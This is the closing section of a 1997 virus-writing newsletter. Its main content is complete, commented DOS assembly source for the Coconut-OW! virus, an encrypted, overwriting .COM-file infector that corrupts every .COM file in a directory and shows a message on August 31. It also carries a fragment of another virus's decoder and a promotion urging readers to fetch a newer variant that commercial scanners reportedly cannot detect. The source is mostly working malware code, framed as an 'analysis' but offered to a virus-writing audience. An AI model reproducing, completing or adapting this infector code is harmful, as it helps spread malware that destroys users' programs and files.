LAB_DECODE_01:
CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT]
DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT]
JB LAB_09
LODSW
SUB AX,CX
XOR AX,CX
ROL AX,CL
STOSW
JMP LAB_DECODE_01
LAB_09:
RET
;
INT_3_OFFSET DB 0F4,06
INT_3_SEGMENT DB 70,00
P_JUMP DB 0E9,7Dh,00
SIGNATURE DB 49,4E
ORIGINAL_BYTES DB 90,90,90,90,90
PARENT_DIR DB '..',0
P_COUNT DB 0FF,0FF
U_K DB 01
P_KEY DB 00,00
P_DIRECTORY DB '\'
;------------------
; XXXX:08CE Directory Puffer
; XXXX:090E New_DTA_Adr
;
; 090E reserved
; 0923 attrib.
; 0924 time
; 0926 date
; 0928 file length (low)
; 092A file length (high)
; 092C file name
;
And here is the Coconut-OW! virus;
; -------------------------------------------------------------
; The COCONUT-OW! virus (Coconut.1323)
; (analysis by DooMSday)
; =============================================================
; * direct action, overwriting com-file infector
; * activation date: August 31st ---> displays message
; * no date/time change
; * encrypted
; * tries to infect all files in the current directory
; * contains a bug (?) (see EOF)
; * virus author: The King Lizard
; ------------------------------------------------------------------------
.MODEL TINY
.RADIX 16
.CODE
ORG 100
START:
CALL DECODE
JMP short LAB_01
PROC_02:
CALL NEW_KEY
MOV DX,009E
CALL ENCODE
MOV AX,4300 ;read file attribute
INT 01
MOV [ATTRIBUTE],CX
XOR CX,CX
MOV AX,4301 ;set file attribute
INT 01
MOV AX,3D02 ;open file: read/write
INT 01
JB PAYLOAD
XCHG BX,AX
MOV AX,5700 ;get file date/time
INT 01
MOV [FILE_DATE],DX ;and save
MOV [FILE_TIME],CX
MOV DX,0100
MOV AH,40 ;write file
MOV CX,052Bh
INT 01
MOV AX,5701 ;set file date/time
MOV CX,[FILE_TIME]
MOV DX,[FILE_DATE]
INT 01
MOV AH,3E ;close file
INT 01
MOV DX,009E
MOV CX,[ATTRIBUTE]
MOV AX,4301 ;set file attribute
INT 01
CALL DECODE
RET
LAB_01:
CLI ;set Int 01h-vector
PUSH DS ;to Int 21h-routine
XOR AX,AX
MOV DS,AX
MOV AX,word ptr[offset start-0FC] ;[0004]
MOV CS:[INT_01_OFFSET],AX
MOV AX,word ptr[offset start-0FA] ;[0006]
MOV CS:[INT_01_SEGMENT],AX
MOV AX,word ptr[offset start-7C] ;[0084]
MOV word ptr[offset start-0FC],AX ;[0004]
MOV AX,word ptr[offset start-7A] ;[0086]
MOV word ptr[offset start-0FA],AX ;[0006]
POP DS
STI
MOV DX,01D9 ;offset (FILE)
MOV AH,4E ;find first
MOV CX,0007
INT 01
JNB LAB_02
JMP short PAYLOAD
LAB_02:
CALL PROC_02
MOV DX,0080
MOV AH,4F ;find next
INT 01
JNB LAB_03
JMP short PAYLOAD
LAB_03:
JMP short LAB_02
PAYLOAD:
MOV AH,2A ;get date
INT 01
CMP DH,08 ;month=8 ?
JNZ LAB_PAYLOAD_1
CMP DL,1F ;day=31 ?
JNZ LAB_PAYLOAD_1
MOV AH,09 ;display string
MOV DX,0202 ;offset (MESSAGE)
INT 01
LAB_PAYLOAD_1:
CLI
PUSH DS
XOR AX,AX
MOV DS,AX
MOV AX,CS:[INT_01_OFFSET]
MOV word ptr[offset start-0FC],AX ;[0004]
MOV AX,CS:[INT_01_SEGMENT]
MOV word ptr[offset start-0FA],AX ;[0006]
POP DS
STI
INT 20 ;exit to DOS
NEW_KEY:
MOV AH,2C ;get time
INT 01
CMP DX,+00
JZ NEW_KEY
MOV [KEY],DX
RET
;
FILE db '*.COM',0
INFO db '[Virus coconut, by The King Lizard]'
;
MESSAGE DB 0Dh,0A,' ooooo@@@@@@@@@@@@@ooooo'
DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A,' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo'
DB 0Dh,0A,' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o'
DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o'
DB 0Dh,0A,' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o'
DB 0Dh,0A,' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@'
DB 0Dh,0A,' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@'
DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
DB 0Dh,0A,'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@'
DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A,'@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@'
DB 0Dh,0A,' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@'
DB 0Dh,0A,' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@'
DB 0Dh,0A,' @@@o "@@@"@@@@@@"@@@" o@@@'
DB 0Dh,0A,' @@@@o @ @ o@@@"'
DB 0Dh,0A,' "@@@@o o@@@@'
DB 0Dh,0A,' "@@@@@o o@@@@@"'
DB 0Dh,0A,' ""@@@@@oooooooooooooooo@@@@@""'
DB 0Dh,0A,' ""@@@@@@@@@@@@@@@@@@@@""'
DB 0Dh,0A,' ""@@@@@@@@@@@@@""'
DB 0Dh,0A,'$'
;
DB 0,0 ;?
COUNT dw 0
KEY dw 0
;
FILE_DATE dw 0
FILE_TIME dw 0
ATTRIBUTE dw 0
;
INT_01_OFFSET dw 0
INT_01_SEGMENT dw 0
ENCODE:
CALL PROC_01
LAB_ENCODE_01:
CMP WORD PTR [COUNT],+00
JZ LAB_ENCODE_02
LODSW
ROR AX,CL
XOR AX,CX
ADD AX,CX
STOSW
DEC WORD PTR [COUNT]
JMP short LAB_ENCODE_01
LAB_ENCODE_02:
RET
PROC_01:
MOV WORD PTR [COUNT],023E
MOV SI,015E
MOV CX,[KEY]
MOV DI,SI
RET
DECODE:
CALL PROC_01
LAB_DECODE_1:
CMP WORD PTR [COUNT],+00
JZ LAB_DECODE_2
LODSW
SUB AX,CX
XOR AX,CX
ROL AX,CL
STOSW
DEC WORD PTR [COUNT]
JMP short LAB_DECODE_1
LAB_DECODE_2:
INT 3 ;BUG! (shouldn't it be "RET" ?)
END START
----------------------------------------------
And for those whom just cannot wait for more of the coconut family,
be sure to head on over to Virus Heaven for the newest addition to the
family, the COCONUT-2099 virus. It is appending, non-resident w/ double
encryption, handler on int 24h, Antitracer, keyboard blocking, dot-dot
search and hooks int 3h. It does not infect files exe files under 1k or
files over 500k. It does not infect .COM files that have been renamed .EXE.
Un-offensive payload and is currently (March 5, 1997) undetectable by
commercial Virus scanners.
=============================================================================
SECTION - 9
The End
Well so brings another close to the Virus Heaven Newsletter. I
expect that you guys will leave me alone for a week or two before hounding
me about when issue #4 will be out. I will admit this one took awhile to
get out, hell I have been working on it since before Christmas. But
I have a few ideas for articles. I may even be doing some research on
this next one, but that is all I will say for now. And of course, as always,
if you write an article send it in. I do have one request though,
Please don't send me anymore TROJAN handbooks and tutorials. This was it,
I wanna at least keep this thing as focused as a passed out drunkard on the
curb.
